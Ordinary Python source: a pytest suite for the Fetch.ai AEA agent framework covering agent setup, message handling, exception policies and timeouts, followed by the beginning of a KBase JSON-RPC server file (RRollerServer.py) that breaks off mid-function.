private_key_path = os.path.join(CUR_PATH, "data", DEFAULT_PRIVATE_KEY_FILE)
builder = AEABuilder()
builder.set_name("my_name").add_private_key(DEFAULT_LEDGER, private_key_path)
my_AEA = builder.build()
assert my_AEA.context == my_AEA._context, "Cannot access the Agent's Context"
assert (
not my_AEA.context.connection_status.is_connected
), "AEA should not be connected."
my_AEA.setup()
assert my_AEA.resources is not None, "Resources must not be None after setup"
my_AEA.resources = Resources()
assert my_AEA.resources is not None, "Resources must not be None after set"
assert (
my_AEA.context.shared_state is not None
), "Shared state must not be None after set"
assert my_AEA.context.task_manager is not None
assert my_AEA.context.identity is not None, "Identity must not be None after set."
my_AEA.teardown()
def test_act():
"""Tests the act function of the AEA."""
agent_name = "MyAgent"
private_key_path = os.path.join(CUR_PATH, "data", DEFAULT_PRIVATE_KEY_FILE)
builder = AEABuilder()
builder.set_name(agent_name)
builder.add_private_key(DEFAULT_LEDGER, private_key_path)
builder.add_skill(Path(CUR_PATH, "data", "dummy_skill"))
agent = builder.build()
with run_in_thread(agent.start, timeout=20):
wait_for_condition(lambda: agent.is_running, timeout=20)
behaviour = agent.resources.get_behaviour(DUMMY_SKILL_PUBLIC_ID, "dummy")
time.sleep(1)
wait_for_condition(lambda: behaviour.nb_act_called > 0, timeout=20)
agent.stop()
def test_start_stop():
"""Tests the act function of the AEA."""
agent_name = "MyAgent"
private_key_path = os.path.join(CUR_PATH, "data", DEFAULT_PRIVATE_KEY_FILE)
builder = AEABuilder()
builder.set_name(agent_name)
builder.add_private_key(DEFAULT_LEDGER, private_key_path)
builder.add_skill(Path(CUR_PATH, "data", "dummy_skill"))
agent = builder.build()
with run_in_thread(agent.start, timeout=20):
wait_for_condition(lambda: agent.is_running, timeout=20)
agent.stop()
def test_double_start():
"""Tests the act function of the AEA."""
agent_name = "MyAgent"
private_key_path = os.path.join(CUR_PATH, "data", DEFAULT_PRIVATE_KEY_FILE)
builder = AEABuilder()
builder.set_name(agent_name)
builder.add_private_key(DEFAULT_LEDGER, private_key_path)
builder.add_skill(Path(CUR_PATH, "data", "dummy_skill"))
agent = builder.build()
with run_in_thread(agent.start, timeout=20):
try:
wait_for_condition(lambda: agent.is_running, timeout=20)
t = Thread(target=agent.start)
t.start()
time.sleep(1)
assert not t.is_alive()
finally:
agent.stop()
t.join()
def test_react():
"""Tests income messages."""
with LocalNode() as node:
agent_name = "MyAgent"
private_key_path = os.path.join(CUR_PATH, "data", DEFAULT_PRIVATE_KEY_FILE)
builder = AEABuilder()
builder.set_name(agent_name)
builder.add_private_key(DEFAULT_LEDGER, private_key_path)
builder.add_protocol(
Path(ROOT_DIR, "packages", "fetchai", "protocols", "oef_search")
)
builder.add_connection(
Path(ROOT_DIR, "packages", "fetchai", "connections", "local")
)
local_connection_id = OEFLocalConnection.connection_id
builder.set_default_connection(local_connection_id)
builder.add_skill(Path(CUR_PATH, "data", "dummy_skill"))
agent = builder.build(connection_ids=[local_connection_id])
# This is a temporary workaround to feed the local node to the OEF Local connection
# TODO remove it.
local_connection = agent.resources.get_connection(local_connection_id)
local_connection._local_node = node
msg = DefaultMessage(
dialogue_reference=("", ""),
message_id=1,
target=0,
performative=DefaultMessage.Performative.BYTES,
content=b"hello",
)
msg.to = agent.identity.address
msg.sender = agent.identity.address
envelope = Envelope(to=msg.to, sender=msg.sender, message=msg,)
with run_in_thread(agent.start, timeout=20, on_exit=agent.stop):
wait_for_condition(lambda: agent.is_running, timeout=20)
agent.outbox.put(envelope)
default_protocol_public_id = DefaultMessage.protocol_id
dummy_skill_public_id = DUMMY_SKILL_PUBLIC_ID
handler = agent.resources.get_handler(
default_protocol_public_id, dummy_skill_public_id
)
assert handler is not None, "Handler is not set."
wait_for_condition(
lambda: len(handler.handled_messages) > 0,
timeout=20,
error_msg="The message is not inside the handled_messages.",
)
def test_handle():
"""Tests handle method of an agent."""
with LocalNode() as node:
agent_name = "MyAgent"
private_key_path = os.path.join(CUR_PATH, "data", DEFAULT_PRIVATE_KEY_FILE)
builder = AEABuilder()
builder.set_name(agent_name)
builder.add_private_key(DEFAULT_LEDGER, private_key_path)
builder.add_protocol(Path(ROOT_DIR, "packages", "fetchai", "protocols", "fipa"))
builder.add_protocol(
Path(ROOT_DIR, "packages", "fetchai", "protocols", "oef_search")
)
builder.add_connection(
Path(ROOT_DIR, "packages", "fetchai", "connections", "local")
)
local_connection_id = OEFLocalConnection.connection_id
builder.set_default_connection(local_connection_id)
builder.add_skill(Path(CUR_PATH, "data", "dummy_skill"))
an_aea = builder.build(connection_ids=[local_connection_id])
# This is a temporary workaround to feed the local node to the OEF Local connection
# TODO remove it.
local_connection = an_aea.resources.get_connection(local_connection_id)
local_connection._local_node = node
msg = DefaultMessage(
dialogue_reference=("", ""),
message_id=1,
target=0,
performative=DefaultMessage.Performative.BYTES,
content=b"hello",
)
msg.to = an_aea.identity.address
msg.sender = an_aea.identity.address
encoded_msg = DefaultSerializer.encode(msg)
error_handler = an_aea._error_handler
with run_in_thread(an_aea.start, timeout=5):
wait_for_condition(lambda: an_aea.is_running, timeout=10)
dummy_skill = an_aea.resources.get_skill(DUMMY_SKILL_PUBLIC_ID)
dummy_handler = dummy_skill.skill_context.handlers.dummy
# UNSUPPORTED PROTOCOL
envelope = Envelope(to=msg.to, sender=msg.sender, message=msg,)
envelope._protocol_specification_id = UNKNOWN_PROTOCOL_PUBLIC_ID
# send envelope via localnode back to agent/bypass `outbox` put consistency checks
assert error_handler.unsupported_protocol_count == 0
an_aea.outbox.put(envelope)
wait_for_condition(
lambda: error_handler.unsupported_protocol_count == 1, timeout=2,
)
# DECODING ERROR
envelope = Envelope(
to=an_aea.identity.address,
sender=an_aea.identity.address,
protocol_specification_id=DefaultMessage.protocol_specification_id,
message=b"",
)
assert error_handler.decoding_error_count == 0
an_aea.runtime.multiplexer.put(envelope)
wait_for_condition(
lambda: error_handler.decoding_error_count == 1, timeout=5,
)
# UNSUPPORTED SKILL
msg = FipaMessage(
performative=FipaMessage.Performative.ACCEPT,
message_id=1,
dialogue_reference=(str(0), ""),
target=0,
)
msg.to = an_aea.identity.address
msg.sender = an_aea.identity.address
envelope = Envelope(to=msg.to, sender=msg.sender, message=msg,)
# send envelope via localnode back to agent/bypass `outbox` put consistency checks
assert error_handler.no_active_handler_count == 0
an_aea.outbox.put(envelope)
wait_for_condition(
lambda: error_handler.no_active_handler_count == 1, timeout=5,
)
# DECODING OK
envelope = Envelope(
to=msg.to,
sender=msg.sender,
protocol_specification_id=DefaultMessage.protocol_specification_id,
message=encoded_msg,
)
# send envelope via localnode back to agent/bypass `outbox` put consistency checks
assert len(dummy_handler.handled_messages) == 0
an_aea.runtime.multiplexer.put(envelope)
wait_for_condition(
lambda: len(dummy_handler.handled_messages) == 1, timeout=5,
)
an_aea.stop()
def test_initialize_aea_programmatically():
"""Test that we can initialize an AEA programmatically."""
with LocalNode() as node:
agent_name = "MyAgent"
private_key_path = os.path.join(CUR_PATH, "data", DEFAULT_PRIVATE_KEY_FILE)
builder = AEABuilder()
builder.set_name(agent_name)
builder.add_private_key(DEFAULT_LEDGER, private_key_path)
builder.add_protocol(
Path(ROOT_DIR, "packages", "fetchai", "protocols", "oef_search")
)
builder.add_connection(
Path(ROOT_DIR, "packages", "fetchai", "connections", "local")
)
local_connection_id = OEFLocalConnection.connection_id
builder.set_default_connection(local_connection_id)
builder.add_skill(Path(CUR_PATH, "data", "dummy_skill"))
an_aea = builder.build(connection_ids=[local_connection_id])
local_connection = an_aea.resources.get_connection(local_connection_id)
local_connection._local_node = node
expected_message = DefaultMessage(
dialogue_reference=("", ""),
message_id=1,
target=0,
performative=DefaultMessage.Performative.BYTES,
content=b"hello",
)
expected_message.to = an_aea.identity.address
expected_message.sender = an_aea.identity.address
envelope = Envelope(
to=expected_message.to,
sender=expected_message.sender,
message=expected_message,
)
with run_in_thread(an_aea.start, timeout=5, on_exit=an_aea.stop):
wait_for_condition(lambda: an_aea.is_running, timeout=10)
an_aea.outbox.put(envelope)
dummy_skill_id = DUMMY_SKILL_PUBLIC_ID
dummy_behaviour_name = "dummy"
dummy_behaviour = an_aea.resources.get_behaviour(
dummy_skill_id, dummy_behaviour_name
)
wait_for_condition(lambda: dummy_behaviour is not None, timeout=10)
wait_for_condition(lambda: dummy_behaviour.nb_act_called > 0, timeout=10)
# TODO the previous code caused an error:
# _pickle.PicklingError: Can't pickle <class 'tasks.DummyTask'>: import of module 'tasks' failed
dummy_task = DummyTask()
task_id = an_aea.enqueue_task(dummy_task)
async_result = an_aea.get_task_result(task_id)
expected_result = async_result.get(10.0)
assert expected_result == 1
dummy_handler = an_aea.resources.get_handler(
DefaultMessage.protocol_id, dummy_skill_id
)
dummy_handler_alt = an_aea.resources._handler_registry.fetch(
(dummy_skill_id, "dummy")
)
wait_for_condition(lambda: dummy_handler == dummy_handler_alt, timeout=10)
wait_for_condition(lambda: dummy_handler is not None, timeout=10)
wait_for_condition(
lambda: len(dummy_handler.handled_messages) == 1, timeout=10
)
wait_for_condition(
lambda: dummy_handler.handled_messages[0] == expected_message,
timeout=10,
)
def test_initialize_aea_programmatically_build_resources():
"""Test that we can initialize the agent by building the resource object."""
try:
temp = tempfile.mkdtemp(prefix="test_aea_resources")
with LocalNode() as node:
agent_name = "MyAgent"
private_key_path = os.path.join(CUR_PATH, "data", DEFAULT_PRIVATE_KEY_FILE)
wallet = Wallet({DEFAULT_LEDGER: private_key_path})
identity = Identity(agent_name, address=wallet.addresses[DEFAULT_LEDGER])
connection = _make_local_connection(agent_name, node)
resources = Resources()
default_protocol = Protocol.from_dir(
str(Path("packages", "fetchai", "protocols", "default"))
)
resources.add_protocol(default_protocol)
resources.add_connection(connection)
an_aea = AEA(
identity,
wallet,
resources=resources,
data_dir=MagicMock(),
default_connection=connection.public_id,
)
error_skill = Skill.from_dir(
str(Path("packages", "fetchai", "skills", "error")),
agent_context=an_aea.context,
)
dummy_skill = Skill.from_dir(
str(Path(CUR_PATH, "data", "dummy_skill")), agent_context=an_aea.context
)
resources.add_skill(dummy_skill)
resources.add_skill(error_skill)
expected_message = DefaultMessage(
dialogue_reference=("", ""),
message_id=1,
target=0,
performative=DefaultMessage.Performative.BYTES,
content=b"hello",
)
expected_message.to = agent_name
expected_message.sender = agent_name
with run_in_thread(an_aea.start, timeout=5, on_exit=an_aea.stop):
wait_for_condition(lambda: an_aea.is_running, timeout=10)
an_aea.outbox.put(
Envelope(
to=agent_name, sender=agent_name, message=expected_message,
)
)
dummy_skill_id = DUMMY_SKILL_PUBLIC_ID
dummy_behaviour_name = "dummy"
dummy_behaviour = an_aea.resources.get_behaviour(
dummy_skill_id, dummy_behaviour_name
)
wait_for_condition(lambda: dummy_behaviour is not None, timeout=10)
wait_for_condition(
lambda: dummy_behaviour.nb_act_called > 0, timeout=10
)
dummy_task = DummyTask()
task_id = an_aea.enqueue_task(dummy_task)
async_result = an_aea.get_task_result(task_id)
expected_result = async_result.get(10.0)
assert expected_result == 1
dummy_handler_name = "dummy"
dummy_handler = an_aea.resources._handler_registry.fetch(
(dummy_skill_id, dummy_handler_name)
)
dummy_handler_alt = an_aea.resources.get_handler(
DefaultMessage.protocol_id, dummy_skill_id
)
wait_for_condition(
lambda: dummy_handler == dummy_handler_alt, timeout=10
)
wait_for_condition(lambda: dummy_handler is not None, timeout=10)
wait_for_condition(
lambda: len(dummy_handler.handled_messages) == 1, timeout=10
)
wait_for_condition(
lambda: dummy_handler.handled_messages[0] == expected_message,
timeout=10,
)
finally:
Path(temp).rmdir()
def test_add_behaviour_dynamically():
"""Test that we can add a behaviour dynamically."""
agent_name = "MyAgent"
private_key_path = os.path.join(CUR_PATH, "data", DEFAULT_PRIVATE_KEY_FILE)
wallet = Wallet({DEFAULT_LEDGER: private_key_path})
data_dir = MagicMock()
resources = Resources()
identity = Identity(agent_name, address=wallet.addresses[DEFAULT_LEDGER])
connection = _make_local_connection(identity.address, LocalNode())
resources.add_connection(connection)
agent = AEA(
identity, wallet, resources, data_dir, default_connection=connection.public_id,
)
resources.add_component(
Skill.from_dir(
Path(CUR_PATH, "data", "dummy_skill"), agent_context=agent.context
)
)
for skill in resources.get_all_skills():
skill.skill_context.set_agent_context(agent.context)
dummy_skill_id = DUMMY_SKILL_PUBLIC_ID
old_nb_behaviours = len(agent.resources.get_behaviours(dummy_skill_id))
with run_in_thread(agent.start, timeout=5, on_exit=agent.stop):
wait_for_condition(lambda: agent.is_running, timeout=10)
dummy_skill = agent.resources.get_skill(dummy_skill_id)
wait_for_condition(lambda: dummy_skill is not None, timeout=10)
new_behaviour = DummyBehaviour(
name="dummy2", skill_context=dummy_skill.skill_context
)
dummy_skill.skill_context.new_behaviours.put(new_behaviour)
wait_for_condition(lambda: new_behaviour.nb_act_called > 0, timeout=10)
wait_for_condition(
lambda: len(agent.resources.get_behaviours(dummy_skill_id))
== old_nb_behaviours + 1,
timeout=10,
)
def test_no_handlers_registered():
"""Test no handlers are registered for message processing."""
agent_name = "MyAgent"
builder = AEABuilder()
private_key_path = os.path.join(CUR_PATH, "data", DEFAULT_PRIVATE_KEY_FILE)
builder.set_name(agent_name)
builder.add_private_key(DEFAULT_LEDGER, private_key_path)
an_aea = builder.build()
with patch.object(an_aea.logger, "warning") as mock_logger:
msg = DefaultMessage(
dialogue_reference=("", ""),
message_id=1,
target=0,
performative=DefaultMessage.Performative.BYTES,
content=b"hello",
)
msg.to = an_aea.identity.address
envelope = Envelope(
to=an_aea.identity.address, sender=an_aea.identity.address, message=msg,
)
with patch(
"aea.registries.filter.Filter.get_active_handlers",
new_callable=PropertyMock,
):
with patch.object(
an_aea.runtime.multiplexer, "put",
):
an_aea.handle_envelope(envelope)
mock_logger.assert_any_call(
f"Cannot handle envelope: no active handler for protocol={msg.protocol_id}. Sender={envelope.sender}, to={envelope.sender}."
)
class TestContextNamespace:
"""Test that the keyword arguments to AEA constructor can be accessible from the skill context."""
@classmethod
def setup_class(cls):
"""Set the test up."""
agent_name = "my_agent"
data_dir = MagicMock()
private_key_path = os.path.join(CUR_PATH, "data", DEFAULT_PRIVATE_KEY_FILE)
wallet = Wallet({DEFAULT_LEDGER: private_key_path})
identity = Identity(agent_name, address=wallet.addresses[DEFAULT_LEDGER])
connection = _make_local_connection(identity.address, LocalNode())
resources = Resources()
resources.add_connection(connection)
cls.context_namespace = {"key1": 1, "key2": 2}
cls.agent = AEA(identity, wallet, resources, data_dir, **cls.context_namespace)
resources.add_component(
Skill.from_dir(
Path(CUR_PATH, "data", "dummy_skill"), agent_context=cls.agent.context
)
)
for skill in resources.get_all_skills():
skill.skill_context.set_agent_context(cls.agent.context)
def test_access_context_namespace(self):
"""Test that we can access the context namespace."""
assert self.agent.context.namespace.key1 == 1
assert self.agent.context.namespace.key2 == 2
for skill in self.agent.resources.get_all_skills():
assert skill.skill_context.namespace.key1 == 1
assert skill.skill_context.namespace.key2 == 2
def test_start_stop_and_start_stop_again():
"""Tests AEA can be started/stopped twice."""
agent_name = "MyAgent"
private_key_path = os.path.join(CUR_PATH, "data", DEFAULT_PRIVATE_KEY_FILE)
builder = AEABuilder()
builder.set_name(agent_name)
builder.add_private_key(DEFAULT_LEDGER, private_key_path)
builder.add_skill(Path(CUR_PATH, "data", "dummy_skill"))
agent = builder.build()
with run_in_thread(agent.start, timeout=20):
wait_for_condition(lambda: agent.is_running, timeout=10)
behaviour = agent.resources.get_behaviour(DUMMY_SKILL_PUBLIC_ID, "dummy")
time.sleep(1)
wait_for_condition(lambda: behaviour.nb_act_called > 0, timeout=5)
agent.stop()
wait_for_condition(lambda: agent.is_stopped, timeout=10)
behaviour.nb_act_called = 0
time.sleep(2)
assert behaviour.nb_act_called == 0
with run_in_thread(agent.start, timeout=20):
wait_for_condition(lambda: agent.is_running, timeout=10)
time.sleep(1)
wait_for_condition(lambda: behaviour.nb_act_called > 0, timeout=5)
agent.stop()
wait_for_condition(lambda: agent.is_stopped, timeout=10)
class ExpectedExcepton(Exception):
"""Exception for testing."""
class TestAeaExceptionPolicy:
"""Tests for exception policies."""
@staticmethod
def raise_exception(*args, **kwargs) -> None:
"""Raise exception for tests."""
raise ExpectedExcepton("we wait it!")
def setup(self) -> None:
"""Set test cae instance."""
agent_name = "MyAgent"
builder = AEABuilder()
builder.set_name(agent_name)
builder.add_private_key(DEFAULT_LEDGER, FETCHAI_PRIVATE_KEY_PATH)
self.handler_called = 0
def handler_func(*args, **kwargs):
self.handler_called += 1
skill_context = SkillContext()
handler_cls = make_handler_cls_from_funcion(handler_func)
behaviour_cls = make_behaviour_cls_from_funcion(handler_func)
self.handler = handler_cls(name="handler1", skill_context=skill_context)
self.behaviour = behaviour_cls(name="behaviour1", skill_context=skill_context)
test_skill = Skill(
SkillConfig(name="test_skill", author="fetchai"),
skill_context=skill_context,
handlers={"handler": self.handler},
behaviours={"behaviour": self.behaviour},
)
skill_context._skill = test_skill # weird hack
builder.add_component_instance(test_skill)
self.aea = builder.build()
self.aea_tool = AeaTool(self.aea)
def test_no_exceptions(self) -> None:
"""Test act and handle works if no exception raised."""
t = Thread(target=self.aea.start)
t.start()
self.aea_tool.put_inbox(self.aea_tool.dummy_envelope())
time.sleep(1)
try:
assert self.handler_called >= 2
finally:
self.aea.stop()
t.join()
def test_handle_propagate(self) -> None:
"""Test propagate policy on message handle."""
self.aea._skills_exception_policy = ExceptionPolicyEnum.propagate
self.handler.handle = self.raise_exception # type: ignore # cause error: Cannot assign to a method
self.aea_tool.put_inbox(self.aea_tool.dummy_envelope())
with pytest.raises(AEAHandleException):
with pytest.raises(ExpectedExcepton):
self.aea.start()
assert not self.aea.is_running
def test_handle_stop_and_exit(self) -> None:
"""Test stop and exit policy on message handle."""
self.aea._skills_exception_policy = ExceptionPolicyEnum.stop_and_exit
self.handler.handle = self.raise_exception # type: ignore # cause error: Cannot assign to a method
self.aea_tool.put_inbox(self.aea_tool.dummy_envelope())
with pytest.raises(
AEAException, match=r"AEA was terminated cause exception .*"
):
self.aea.start()
assert not self.aea.is_running
def test_handle_just_log(self) -> None:
"""Test just log policy on message handle."""
self.aea._skills_exception_policy = ExceptionPolicyEnum.just_log
self.handler.handle = self.raise_exception # type: ignore # cause error: Cannot assign to a method
with patch.object(self.aea._logger, "exception") as patched:
t = Thread(target=self.aea.start)
t.start()
self.aea_tool.put_inbox(self.aea_tool.dummy_envelope())
self.aea_tool.put_inbox(self.aea_tool.dummy_envelope())
time.sleep(1)
try:
assert self.aea.is_running
assert patched.call_count == 2
finally:
self.aea.stop()
t.join()
def test_act_propagate(self) -> None:
"""Test propagate policy on behaviour act."""
self.aea._skills_exception_policy = ExceptionPolicyEnum.propagate
self.behaviour.act = self.raise_exception # type: ignore # cause error: Cannot assign to a method
with pytest.raises(AEAActException):
with pytest.raises(ExpectedExcepton):
self.aea.start()
assert self.aea.runtime.state == RuntimeStates.error
def test_act_stop_and_exit(self) -> None:
"""Test stop and exit policy on behaviour act."""
self.aea._skills_exception_policy = ExceptionPolicyEnum.stop_and_exit
self.behaviour.act = self.raise_exception # type: ignore # cause error: Cannot assign to a method
with pytest.raises(
AEAException, match=r"AEA was terminated cause exception .*"
):
self.aea.start()
assert not self.aea.is_running
def test_act_just_log(self) -> None:
"""Test just log policy on behaviour act."""
self.aea._skills_exception_policy = ExceptionPolicyEnum.just_log
self.behaviour.act = self.raise_exception # type: ignore # cause error: Cannot assign to a method
with patch.object(self.aea.logger, "exception") as patched:
t = Thread(target=self.aea.start)
t.start()
time.sleep(1)
try:
assert self.aea.is_running
assert patched.call_count > 1
finally:
self.aea.stop()
t.join()
def test_act_bad_policy(self) -> None:
"""Test propagate policy on behaviour act."""
self.aea._skills_exception_policy = "non exists policy" # type: ignore
self.behaviour.act = self.raise_exception # type: ignore # cause error: Cannot assign to a method
with pytest.raises(AEAException, match=r"Unsupported exception policy.*"):
self.aea.start()
assert not self.aea.is_running
def teardown(self) -> None:
"""Stop AEA if not stopped."""
self.aea.stop()
def sleep_a_bit(sleep_time: float = 0.1, num_of_sleeps: int = 1) -> None:
"""Sleep num_of_sleeps time for sleep_time.
:param sleep_time: time to sleep.
:param num_of_sleeps: how many time sleep for sleep_time.
:return: None
"""
for _ in range(num_of_sleeps):
time.sleep(sleep_time)
class BaseTimeExecutionCase(TestCase):
"""Base Test case for code execute timeout."""
BASE_TIMEOUT = 0.35
@classmethod
def setUpClass(cls) -> None:
"""Set up."""
if cls is BaseTimeExecutionCase:
raise unittest.SkipTest("Skip BaseTest tests, it's a base class")
def tearDown(self) -> None:
"""Tear down."""
self.aea_tool.teardown()
self.aea_tool.aea.runtime.agent_loop._teardown()
def prepare(self, function: Callable) -> None:
"""Prepare aea_tool for testing.
:param function: function be called on react handle or/and Behaviour.act
:return: None
"""
agent_name = "MyAgent"
builder = AEABuilder()
builder.set_name(agent_name)
builder.add_private_key(DEFAULT_LEDGER, FETCHAI_PRIVATE_KEY_PATH)
self.function_finished = False
def handler_func(*args, **kwargs):
function()
self.function_finished = True
skill_context = SkillContext()
handler_cls = make_handler_cls_from_funcion(handler_func)
behaviour_cls = make_behaviour_cls_from_funcion(handler_func)
self.behaviour = behaviour_cls(name="behaviour1", skill_context=skill_context)
test_skill = Skill(
SkillConfig(name="test_skill", author="fetchai"),
skill_context=skill_context,
handlers={
"handler1": handler_cls(name="handler1", skill_context=skill_context)
},
behaviours={"behaviour1": self.behaviour},
)
skill_context._skill = test_skill # weird hack
builder.add_component_instance(test_skill)
my_aea = builder.build()
self.aea_tool = AeaTool(my_aea)
self.envelope = AeaTool.dummy_envelope()
self.aea_tool.aea.runtime.agent_loop._setup()
def test_long_handler_cancelled_by_timeout(self):
"""Test long function terminated by timeout."""
num_sleeps = 10
sleep_time = self.BASE_TIMEOUT
function_sleep_time = num_sleeps * sleep_time
execution_timeout = self.BASE_TIMEOUT * 2
assert execution_timeout < function_sleep_time
self.prepare(lambda: sleep_a_bit(sleep_time, num_sleeps))
self.aea_tool.set_execution_timeout(execution_timeout)
with timeit_context() as timeit:
self.aea_action()
assert execution_timeout <= timeit.time_passed <= function_sleep_time
assert not self.function_finished
def test_short_handler_not_cancelled_by_timeout(self):
"""Test short function NOT terminated by timeout."""
num_sleeps = 1
sleep_time = self.BASE_TIMEOUT
function_sleep_time = num_sleeps * sleep_time
execution_timeout = self.BASE_TIMEOUT * 2
assert function_sleep_time <= execution_timeout
self.prepare(lambda: sleep_a_bit(sleep_time, num_sleeps))
self.aea_tool.set_execution_timeout(execution_timeout)
self.aea_tool.setup()
with timeit_context() as timeit:
self.aea_action()
assert function_sleep_time <= timeit.time_passed <= execution_timeout
assert self.function_finished
def test_no_timeout(self):
"""Test function NOT terminated by timeout cause timeout == 0."""
num_sleeps = 1
sleep_time = self.BASE_TIMEOUT
function_sleep_time = num_sleeps * sleep_time
execution_timeout = 0
self.prepare(lambda: sleep_a_bit(sleep_time, num_sleeps))
self.aea_tool.set_execution_timeout(execution_timeout)
self.aea_tool.setup()
with timeit_context() as timeit:
self.aea_action()
assert function_sleep_time <= timeit.time_passed
assert self.function_finished
class HandleTimeoutExecutionCase(BaseTimeExecutionCase):
"""Test handle envelope timeout."""
def aea_action(self):
"""Spin react on AEA."""
self.aea_tool.aea.runtime.agent_loop._execution_control(
self.aea_tool.handle_envelope, [self.envelope]
)
class ActTimeoutExecutionCase(BaseTimeExecutionCase):
"""Test act timeout."""
def aea_action(self):
"""Spin act on AEA."""
self.aea_tool.aea.runtime.agent_loop._execution_control(
self.behaviour.act_wrapper
)
def test_skill2skill_message():
"""Tests message can be sent directly to any skill."""
with tempfile.TemporaryDirectory() as dir_name:
with cd(dir_name):
agent_name = "MyAgent"
private_key_path = os.path.join(CUR_PATH, "data", DEFAULT_PRIVATE_KEY_FILE)
builder = AEABuilder(registry_dir=Path(ROOT_DIR, "packages"))
builder.set_name(agent_name)
builder.add_private_key(DEFAULT_LEDGER, private_key_path)
builder.add_skill(Path(CUR_PATH, "data", "dummy_skill"))
builder.add_connection(
Path(ROOT_DIR, "packages", "fetchai", "connections", "stub")
)
agent = builder.build()
msg = DefaultMessage(
dialogue_reference=("", ""),
message_id=1,
target=0,
performative=DefaultMessage.Performative.BYTES,
content=b"hello",
)
msg.to = str(DUMMY_SKILL_PUBLIC_ID)
msg.sender = "some_author/some_skill:0.1.0"
envelope = Envelope(to=msg.to, sender=msg.sender, message=msg,)
with run_in_thread(agent.start, timeout=20, on_exit=agent.stop):
wait_for_condition(lambda: agent.is_running, timeout=20)
default_protocol_public_id = DefaultMessage.protocol_id
handler = agent.resources.get_handler(
default_protocol_public_id, DUMMY_SKILL_PUBLIC_ID
)
assert handler is not None, "Handler is not set."
# send an envelope to itself
handler.context.send_to_skill(envelope)
wait_for_condition(
lambda: len(handler.handled_messages) == 1,
timeout=5,
error_msg="The message is not inside the handled_messages.",
)
|
RRollerServer.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from wsgiref.simple_server import make_server
import sys
import json
import traceback
import datetime
from multiprocessing import Process
from getopt import getopt, GetoptError
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError,\
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from os import environ
from ConfigParser import ConfigParser
from biokbase import log
import requests as _requests
import random as _random
import os
from RRoller.authclient import KBaseAuth as _KBaseAuth
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-server-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'RRoller'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from RRoller.RRollerImpl import RRoller # noqa @IgnorePep8
impl_RRoller = RRoller(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = JSONServerError()
newerr.trace = traceback.format_exc()
if isinstance(e.message, basestring):
newerr.data = e.message
else:
# Some exceptions embed other exceptions as the message
newerr.data = repr(e.message)
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if self.method_data[request['method']].has_key('types'): # noqa @IgnorePep8
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def provenance(self):
callbackURL = os.environ.get('SDK_CALLBACK_URL')
if callbackURL:
# OK, there's a callback server from which we can get provenance
arg_hash = {'method': 'CallbackServer.get_provenance',
'params': [],
'version': '1.1',
'id': str(_random.random())[2:]
}
body = json.dumps(arg_hash)
